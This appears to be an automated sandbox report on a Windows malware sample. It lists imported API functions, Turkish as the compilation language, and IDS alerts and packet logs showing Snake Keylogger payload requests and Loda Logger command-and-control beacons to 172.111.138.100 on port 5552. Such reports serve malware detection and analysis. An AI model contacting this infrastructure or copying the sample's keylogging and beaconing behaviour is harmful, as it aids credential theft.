gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA,
FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                ole32.dllCLSIDFromString
                                                                                                                                kernel32.dllSleep
                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                                wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                                shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                                advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                                wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                                netapi32.dllNetbios
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T18:20:03.412054+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49776 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:03.412054+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:03.412054+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49801 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:11.099872+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.4 | 49739 | 69.42.215.252 | 80 | TCP
2024-12-24T18:20:11.251921+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49735 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:11.252693+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49734 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:11.584241+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:13.951601+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49742 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:13.966068+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49741 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:17.902494+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49761 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:17.904658+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49760 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:20.514638+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49765 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:20.519594+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49766 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:20.769709+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.4 | 49776 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:20.769709+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49776 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:24.516667+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49781 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:24.517934+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49780 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:27.217751+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49785 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:27.226650+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49784 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:29.892187+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.4 | 49801 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:30.233932+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49797 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:30.251805+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49796 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:34.260356+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49809 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:34.270510+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49808 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:36.860379+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49813 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:36.882214+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49814 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:40.321971+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49823 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:40.345193+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49824 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:42.932455+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49829 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:42.946042+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49831 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:46.074262+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49840 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:46.074269+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49839 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:50.040136+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49849 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:50.054776+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49848 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:54.099656+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49857 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:54.250482+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49858 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:58.085509+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49868 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:58.091989+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49867 | 142.250.181.14 | 443 | TCP
2024-12-24T18:20:58.443180+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:21:00.704768+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49873 | 142.250.181.14 | 443 | TCP
2024-12-24T18:21:00.708739+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49876 | 142.250.181.14 | 443 | TCP
2024-12-24T18:21:03.796240+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49890 | 142.250.181.14 | 443 | TCP
2024-12-24T18:21:03.799383+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49889 | 142.250.181.14 | 443 | TCP
2024-12-24T18:21:42.237001+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:22:25.713716+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:23:02.164540+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:23:40.182859+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:24:24.239329+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Dec 24, 2024 18:20:11.703859091 CET555249747172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:12.946367025 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:12.946471930 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:12.946808100 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:12.946885109 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:12.947123051 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:12.947900057 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:12.947982073 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:12.948231936 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.102721930 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.102811098 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.103454113 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.103568077 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.235135078 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.235191107 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.235557079 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.235673904 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.237793922 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.237821102 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.238157034 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.238300085 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.238456011 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.246434927 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.283322096 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.286412001 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.286453962 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.286799908 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.287337065 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.287368059 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.290349960 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.290365934 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.290716887 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.290780067 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.294281006 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.303296089 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:13.339330912 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.343333006 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.951611996 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.951723099 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.951766968 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.951894045 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.951988935 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.952044964 CET44349742142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.952104092 CET49742443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.952662945 CET49752443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.952687979 CET44349752142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.952749968 CET49752443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.953155994 CET49752443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.953169107 CET44349752142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.966080904 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.966186047 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.966200113 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.966300964 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.966330051 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.966356039 CET44349741142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.966403961 CET49741443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.967040062 CET49753443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.967081070 CET44349753142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:13.967173100 CET49753443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.967433929 CET49753443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:13.967451096 CET44349753142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.049243927 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.049282074 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.049333096 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.049345970 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.049364090 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.049396992 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.054966927 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.055005074 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.055028915 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.055053949 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.059549093 CET49745443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.059557915 CET44349745142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.060245037 CET49754443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.060311079 CET44349754142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.060463905 CET49754443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.075972080 CET49754443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.075993061 CET44349754142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.295017004 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.295073986 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.295078039 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.295095921 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.295135021 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.295166969 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.295172930 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.295192957 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.295237064 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.296149015 CET49746443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.296156883 CET44349746142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.297055006 CET49756443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.297095060 CET44349756142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.297172070 CET49756443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.297369957 CET49756443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:14.297383070 CET44349756142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.316337109 CET555249747172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.316405058 CET497475552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:20:14.372457027 CET497475552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:20:14.493253946 CET555249747172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:15.288012028 CET49753443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.288041115 CET49752443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.288075924 CET49754443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:15.288093090 CET49756443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:15.291879892 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.291906118 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:15.292033911 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.292790890 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.292865038 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:15.293085098 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.295480967 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.295486927 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:15.295496941 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:15.295527935 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:16.991384029 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:16.991524935 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:16.992149115 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:16.992217064 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:16.999834061 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:16.999953032 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.002525091 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.002610922 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.003420115 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.003468037 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.003705025 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.003761053 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.005530119 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.008480072 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.008522987 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.009269953 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.009331942 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.009689093 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.051340103 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.051373005 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.902493000 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.902609110 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.902638912 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.902692080 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.903254032 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.903292894 CET44349761142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.903351068 CET49761443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:17.904692888 CET44349760142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:17.904774904 CET49760443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.320269108 CET44349784142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.320300102 CET49785443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.320386887 CET49784443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.320396900 CET44349786142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.320517063 CET49786443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:26.326689005 CET44349787142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.326893091 CET49787443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:26.345943928 CET49784443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.346018076 CET44349784142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.346265078 CET44349784142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.346375942 CET49784443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.347631931 CET49784443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.347634077 CET49786443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:26.347656965 CET44349786142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.347920895 CET44349786142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.347989082 CET49786443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:26.348488092 CET49786443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:26.349167109 CET49787443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:20:26.349183083 CET44349787142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:26.349572897 CET49785443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:20:26.349618912 CET44349785142.250.181.14192.168.2.4
